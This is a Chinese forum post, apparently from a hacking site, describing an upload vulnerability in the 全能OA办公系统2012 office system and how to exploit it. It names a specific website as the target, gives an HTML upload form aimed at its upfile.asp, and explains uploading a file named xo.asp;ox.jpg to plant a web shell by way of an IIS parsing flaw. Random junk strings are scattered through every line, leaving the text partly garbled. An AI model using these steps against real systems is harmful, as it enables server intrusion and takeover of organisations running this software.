全能OA办公系统 上传漏洞5 w$ e: S" u+ e m
- |1 [7 O/ l/ l/ I: z
系统介绍:% Z/ n6 x1 F" o( c0 U
4 ^6 Z9 q( a5 V+ k& ?
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
$ P& v* X3 C a( f# _8 e& ]7 O6 `# i. E2 U( P" v8 j
主要功能:
\$ F- s4 I) ?7 V公司通告
7 m" X& Z: K p0 O {0 p+ r工作计划 , y2 T! K! n4 c! m" m3 {
通讯助理
1 ?7 w0 G- T5 R5 ]! I7 a: @' T客户资源
4 E3 D' Y7 B T8 p9 |. Y* u我的公文 " k6 r' `2 B" K/ ~1 J }
公文传阅 * X( @/ @; `" | ^+ C7 y
公共资源 6 T! {: V7 e* G3 D
资源预约
2 _: L/ C0 G. G8 V; D1 C7 j1 C今日考勤
% S% D# H8 A8 q# u3 \6 |个人计划
9 O* [9 F% _, I$ n个人通讯录
1 [7 P$ W4 Y, ~" b0 D8 \/ H( m个人基本档案
( o( r7 N1 r- G* F3 t# t" R未读邮件 : G+ h' ^0 j! I7 l* p/ `3 o
发邮件
% ~ X& E. ?/ w( h9 T5 h收件夹 ( g! Z. o2 y/ r: F: D) S' H* d. C0 @
寄件夹
* n8 |) A+ V; {( d& ~6 B* u% V7 ]5 y网络硬盘
! ~: L, t6 [% D' [网络会议
9 c6 F) d: X) t* \* G H5 t网络调查
5 C7 h" \) V9 Z+ T" _. {交流论坛: c! c& \( N ~+ i9 c2 R/ o1 V# C
7 \: ?! i9 u" f- r& i! {) @
有兴趣测试的朋友可以下源码看看
0 t* S& C3 f3 ]9 }0 ]" \2 d) E/ ]9 E, H6 f- ~
源码下载:
. i% y: R+ W; N T
; `2 _5 j3 m# b ~; e- }http://www.mycodes.net/30/4750.htm
/ \% W9 O9 d e7 p) R/ J' t" H6 U
1 @' O3 [* g6 _- x漏洞介绍:
, ?; P- u; J1 k3 c5 w2 T9 g: H6 b7 i# t: f; F9 l% K3 X3 {$ g
由upfile.asp上传文件漏洞引起; I7 j0 J% r6 G3 w, k7 G8 j
/ y) d: Z7 v8 ^1 L1 m测试方法:
" E' b3 S( ~. m- ^ C7 u7 W+ ]' X0 z+ A$ ?1 B0 Z
使用名小子上传http://www.itlynn.com/upfile.asp即可
8 h2 H8 i/ m3 I+ I3 P4 Y7 q* ^ q0 c' ?, v+ H1 n& N1 n, i1 p) ]
如果upfile.asp文件被删除不存在。$ P* q, b; l9 \/ B+ k5 w) f
6 F0 W. l/ |! Y( k9 S+ v* }/ r: Y 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。3 b: w+ e- N" R t: d0 T9 X
/ A( {# r( X. [* _! D如果存在那么将如下代码保存为upfile.html。+ ~4 M h& D8 R1 J# Z$ F1 C$ ^
9 g3 c: U- j& e: a2 U+ W! V然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
- b$ A" Y' T+ R; p) Q9 }8 s8 V- K+ S( Q W' T3 k' y2 R, F
3 a" S9 M9 N, }; f' T
0 |; f* t% E7 J! [/ Q; l01 <table border='0' align="center" cellpadding="5">
1 W* }, u8 L, E8 ^( C# w2 m8 k E: q! ]# |7 B# G) ]
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> # ]# G/ X+ ^' u4 W3 F
$ G1 ^# O, ~ ]( B" W1 r
03 <tr> 3 Q3 h# O1 Z) |" v/ n
) U3 ^. u/ ~! O! F' j( l. [$ a04 <td>报错:</td> 1 l3 u* t; f. z3 u2 Y
8 w# a+ r& z6 J* d05 <td><input type='radio' name='errnumber' value='0'> 3 `; j }$ z; A* m. U/ ]
5 s4 M- U% m2 k! N3 a% \3 @
06 自动更名
5 K$ V @* Z% L# ?; q/ [0 \2 ~+ o: I3 x9 N3 `, h
07 <input type='radio' name='errnumber' value='1' checked> 9 ] s1 q: i7 r% O
5 s0 |, D* g' r7 ]3 v8 h4 M& x; g08 报错方式 $ x5 V* ], f9 V B% p
6 g4 Y! z: Y9 k; r
09 <input type='radio' name='errnumber' value='2'>
+ |; p) e5 I' ^$ V+ d$ r
5 U: ^! n. \ q. S7 |10 直接覆盖</td> 7 @2 E; n5 M1 q5 l2 z
* n: X! m$ Y+ \6 x8 k# u9 t9 i3 U& j11 </tr>
h9 w6 Z' [2 E* w: v! y. u) w& a/ l7 i% r- R
12 <tr>
, X9 N3 K" }0 q' L
X& G' K* z1 o+ n0 }; r13 <td>主题:</td> ( Q. {4 E5 h0 ?9 P
) k( h" }) T. s: w14 <td><input type='text' name='filename' size='30'></td> + n5 C; s% w) T4 ~$ j7 U
! O' v( {; `& z: g1 \& j' R15 </tr>
" V8 Q6 T }2 G3 | x! o0 M6 g7 E, M+ y6 F8 ~9 T! E
16 <tr>
( N* [- ?3 P: l c6 e& R5 e- i; V1 E" Q
17 <td>文件:</td>
& k% g5 e" K0 D: X1 x: }
: [6 ]! l" q: S* O% i18 <td><input type="file"name="fruit"size="30"></td>
7 d3 H3 h) j9 `! j0 c1 G" Y, r, w) Q- |0 T! E* n/ M+ e! }
19 </tr>
) Z5 Y* k# I- e* B1 [# Q$ T& c" r% l) ]- U
20 <tr> 1 _- ^: Y; d9 h" \
0 f( f3 _+ Z) ]2 b" a5 S3 i21 <td valign='top'>简介:</td> ' m& y( Z& n+ }; E4 ?/ o* u- {
. m6 a' e4 g' {7 r22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% F" q$ [' b# {" E8 Y2 s
4 ?( E/ u8 W" B; }) A* c23 </tr>
5 S- ^: Y- g7 h, v7 X: ^& R1 N# `# Z) [* ]
24 $ _# `+ w' S f5 |! Y
$ V" f8 o7 R# P. s7 Z4 I25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 6 U9 r: \, w& p/ X" v' L
* q! @& Y# q$ E% J) I
26 </tr>
: i' R. P5 n1 U5 \6 \7 ]
# K, Z" b' Y" e @; a1 G2 B27 </form> ) h+ u! R9 _0 K }# I! V! t
/ `* |. ~# O. F$ L+ h! Y
然后打开上传一个文件名为xo.asp;ox.jpg的文件。) j; Q4 a, I3 |& [0 q Z
% s! ^$ `1 b1 W# g$ F H r( l# I; f& S6 D0 ]2 y+ s
! H! U9 o" \$ M: ]上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg0 i7 a3 @' y( t5 v. m+ j
5 n2 T1 N' Q* ]4 g9 ]; g) }
此漏洞需要配合解析漏洞利用。# r6 i) h3 l3 o! T. E- G: |
; |; H. G% ]: v( i4 N; V# J$ E |